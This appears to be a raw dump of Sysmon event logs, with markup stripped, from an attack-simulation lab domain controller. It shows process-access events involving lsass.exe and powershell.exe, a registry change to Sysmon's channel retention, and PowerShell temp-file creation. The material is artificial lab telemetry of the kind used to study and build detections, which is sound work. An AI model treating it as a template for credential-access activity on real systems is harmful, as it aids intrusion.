13:52:27.212{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:52:27.102{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:28.227{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:28.227{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:28.227{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:28.055{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-851B-5FCF-E302-000000009001}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:28.055{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-851B-5FCF-E302-000000009001}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:28.009{10ACEC4A-851B-5FCF-E302-000000009001}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_110fathx.i0e.ps12020-12-08 13:52:28.009 10341000x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.993{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-E302-000000009001}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.977{10ACEC4A-83B9-5FCF-0E00-000000009001}1096812C:\Windows\system32\LogonUI.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000690Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-83B9-5FCF-0E00-000000009001}1096C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0900-000000009001}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+52568|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.977{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0900-000000009001}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.915{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-851D-5FCF-E702-000000009001}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.915{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-851D-5FCF-E702-000000009001}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-851D-5FCF-E702-000000009001}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xauv0tez.xpf.ps12020-12-08 13:52:29.868 10341000x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-851D-5FCF-E702-000000009001}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B2-5FCF-0700-000000009001}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 